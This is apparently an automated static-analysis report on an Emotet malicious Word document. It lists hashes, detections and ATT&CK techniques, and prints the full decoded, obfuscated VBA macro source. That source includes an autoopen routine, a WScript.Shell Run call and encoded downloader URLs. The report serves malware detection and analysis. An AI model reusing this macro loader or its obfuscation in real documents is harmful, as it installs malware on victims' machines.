Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 1f772e71f20ec786…

MALICIOUS

Office (OLE)

151.1 KB Created: 2019-01-16 15:09:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 0b84937eb1d51c40eb19704c3462d71a SHA-1: 048a37094911d98dc8023ab4c4008d3cdb23224f SHA-256: 1f772e71f20ec786d7fc2c92f8eed6a11308fc9cabc021a5cb828f09b3dc0583
290 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1218.011 System Binary Proxy Execution: Rundll32

The sample is a malicious Word document containing VBA macros. Heuristics indicate the use of WScript.Shell and CreateObject, strongly suggesting the execution of arbitrary code. The ClamAV detection explicitly names Emotet, a known downloader family. The VBA script uses WScript.Shell to likely download and execute a secondary payload from the obfuscated URL.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-6817578-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6817578-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set SaudiRiyaluq = portjh
Buckinghamshireph = "WscRipt.sHeLl"
   Set flexibilityiw = Bordersfr
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set IntelligentSoftBaconhk = monitormj
generatingdi = Array(Computersrn, firewallww, sensoriz, CreateObject("" + opensourcezi + mintgreencb + Upsizedfw + Buckinghamshireph).Run!(("" + expeditewi + microchipzt + Mountainsqa + KenyanShillingzz + Gorgeouswr.TextBox1) + solutionsjh + Gorgeousiw, 55 - 55), Beautyod, Legacyoc, Solutionsiw)
   Set InvestmentAccountfi = eservicespw
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
Sub autoopen()
SMSzu = bricksandclickscs
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://rdwe4k.ir/j]_[v]ZlyC[V;P6JEV59@http://merBedeslan,ha.vn/TR_6?qdyD[ep4?ymYjz@https://Bardealersf_r4kadBredit.net/jYxxBV[82i4kr`vt[k7NWL2nu@http://k_s_lve.B_m/7Z7ZV[EjWpCN@http://denis1994k,.B_m/iti[0vUy[?;3-.Split(-@-)0fr$Metalj_=-Un4krandedzm-0fr$dep_sitBn In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8504 bytes
SHA-256: 256f3eace1481f4a61470c8e76aca91fcf307bfd6e51a50f9fcac15283421972
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Gorgeouswr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "algorithmjz"
Function depositsj()
On Error Resume Next
   Set Plasticdz = GroceryJeweleryGardenbs
Set worldclassok = SleekSteelTableti
Select Case invoicekt
         Case 578
            empowerwr = Internaloz
            withdrawalmm = CLng(275)
         Case 689
            vortalslj = CLng(890)
            orchestrateip = CDate(Handcraftedkj)
            Rusticsf = Int(269)
         Case 46
            neuraloh = Cos(bandwidthnn)
            Softbb = ChrB(921)
            eenableor = SavingsAccountnr
 End Select
Set FTPsw = maximizecj
   Set LicensedWoodenChickenrc = RefinedSteelChipsoj
Set Avonzj = calculatesd
Select Case EXEhp
         Case 762
            Mountainkv = protocolpa
            Nebraskaub = CLng(332)
         Case 226
            ebusinessbs = CLng(315)
            Paangafu = CDate(Lariui)
            solutionswq = Int(732)
         Case 575
            SavingsAccountuj = Cos(ecommerceww)
            RefinedWoodenSausagesqf = ChrB(318)
            circuitnz = Nigerwu
 End Select
Set SaudiRiyaluq = portjh
Buckinghamshireph = "WscRipt.sHeLl"
   Set flexibilityiw = Bordersfr
Set Implementationta = RhodeIslandsw
Select Case Gorgeousac
         Case 37
            HomeLoanAccountji = Corporateit
            Crescentil = CLng(919)
         Case 603
            depositjv = CLng(216)
            turnkeyzz = CDate(HandmadeSoftCheesewh)
            architecturesbh = Int(184)
         Case 119
            Utahqb = Cos(visualizeja)
            Analystrl = ChrB(587)
            supportkj = parsingud
 End Select
Set Totallz = pinkir
   Set depositww = throughputkf
Set withdrawalvr = Borderspr
Select Case Recontextualizedmh
         Case 18
            rebootwn = objectorientedwv
            GBii = CLng(422)
         Case 562
            systemworthyqu = CLng(626)
            SportsGardenjt = CDate(CreditCardAccounthj)
            JeweleryClothingln = Int(133)
         Case 469
            UnitedArabEmirateshz = Cos(Concreteul)
            Executivesn = ChrB(331)
            objectorientedid = Avonwf
 End Select
Set Marylandki = scalabledr
   Set paymentwi = scalablelj
Set coherentvv = copyinghw
Select Case Fantasticci
         Case 129
            standardizationdc = supplychainsao
            paymentvm = CLng(66)
         Case 774
            Tacticsat = CLng(874)
            LicensedPlasticTowelsjn = CDate(IntelligentSoftGloveshs)
            Mississippizo = Int(311)
         Case 576
            XMLfs = Cos(Rubberrk)
            Awesomeuz = ChrB(343)
            Upsizedmi = SASff
 End Select
Set IntelligentSoftBaconhk = monitormj
generatingdi = Array(Computersrn, firewallww, sensoriz, CreateObject("" + opensourcezi + mintgreencb + Upsizedfw + Buckinghamshireph).Run!(("" + expeditewi + microchipzt + Mountainsqa + KenyanShillingzz + Gorgeouswr.TextBox1) + solutionsjh + Gorgeousiw, 55 - 55), Beautyod, Legacyoc, Solutionsiw)
   Set InvestmentAccountfi = eservicespw
Set Multitieredjd = SCSIwm
Select Case Legacytj
         Case 179
            compressingzl = webenabledno
            nextgenerationkb = CLng(344)
         Case 424
            PCIru = CLng(342)
            EuropeanUnitofAccount17EUA17ql = CDate(parsingld)
            navigatelh = Int(694)
         Case 668
            copywh = Cos(navigatejb)
            copyingww = ChrB(79)
            applicationwi = connectingkq
 End Select
Set bandwidthii = Takarl
   Set Engineerpd = convergencekt
Set transmitterfa = deposithn
Select Case GenericFrozenKeyboardji
         Case 249
            Bordersui = webserviceszj
            GraphicInterfacebs = CLng(728)
         Case 297
            overridingmh = CLng(322)
            Inletzr = CDate(JBODhv)
            tanrk = Int(892)
         Case 339
            wirelessjv = Cos(contextuallybasedlk)
            RAMci = ChrB(308)
            hackingzh = Musicbj
 End Select
Set paradigmsbi = IncredibleRubberShirtnr
End Function


Attribute VB_Name = "quantifyingsj"
Function Runww()
Berkshirezp = hackms
bypassingqi = Genericfh
Consultantou = depositos
wirelesspo = CheckingAccountwa
Virginiamd = MoldovanLeuqf
AwesomeFrozenCarpn = userswr
HandcraftedWoodenBaconij = AntarcticatheterritorySouthof60degSwz
Cliffszj = Berkshireor
Portsir = Ridgewz
contextsensitivebk = productizeri
Softjt = monitordu
GenericGraniteSausagesti = Usabilitypu
End Function
Function EuropeanUnitofAccount9EUA9rl()
visualizeac = ConvertibleMarksmn
HealthGamespj = missioncriticalwr
CreditCardAccountii = Enhancedbc
Cambridgeshirezj = Bridgejk
Standalonejc = greenja
Brandingsd = Incrediblepl
HomeLoanAccountff = matrixzr
Sleektu = architecturestv
AutomotiveToolsClothingzi = synthesizingti
magentazw = Cambodiacw
Analystwv = backendvz
InvestmentAccountwa = Assuranceqc
End Function
Sub autoopen()
SMSzu = bricksandclickscs
TastyMetalBaconqi = Accountabilityzh
paymentrw = Plastictz
depositcu = Villagesud
IncredibleCottonCarzv = Directorow
Millspi = Refinedjd
crossplatformfs = Array(depositwz, Softji, Texasum, depositsj, SwissFrancrq, Districtjm, Jeweleryoc)
valueaddedmz = Supervisorik
invoicekz = HomeLoanAccountrz
withdrawalsb = Hillbz
wirelessak = Engineerlw
Virginiapo = backinguppf
SavingsAccountzz = Marylandpb
End Sub
Function impactfulna()
hapticsf = paradigmsbz
MoneyMarketAccountfv = B2Bwj
withdrawaljm = Berkshirewz
methodologieswi = ivoryzs
BeautyGroceryShoesvp = Metalba
PCIhi = Chadiq
Musicok = Borderskq
Talazl = Gamesvw
AutoLoanAccountqf = zerotolerancefc
Armeniaaa = TunisianDinarvd
SleekFreshBaconjv = overridingri
transmittingbj = Leadko
End Function

Attribute VB_Name = "USDollarrl"

Attribute VB_Name = "Ohiodl"

Attribute VB_Name = "Woodenjl"

Attribute VB_Name = "artificialintelligencerk"

Attribute VB_Name = "Tennesseejv"

Attribute VB_Name = "Forwardjw"

Attribute VB_Name = "WestVirginialf"

Attribute VB_Name = "Genericrq"

Attribute VB_Name = "ebusinessdw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "highlevelcm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Clonedbv"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Executivezw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "adaptertz"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "complexityov"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "plugandplayfr"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.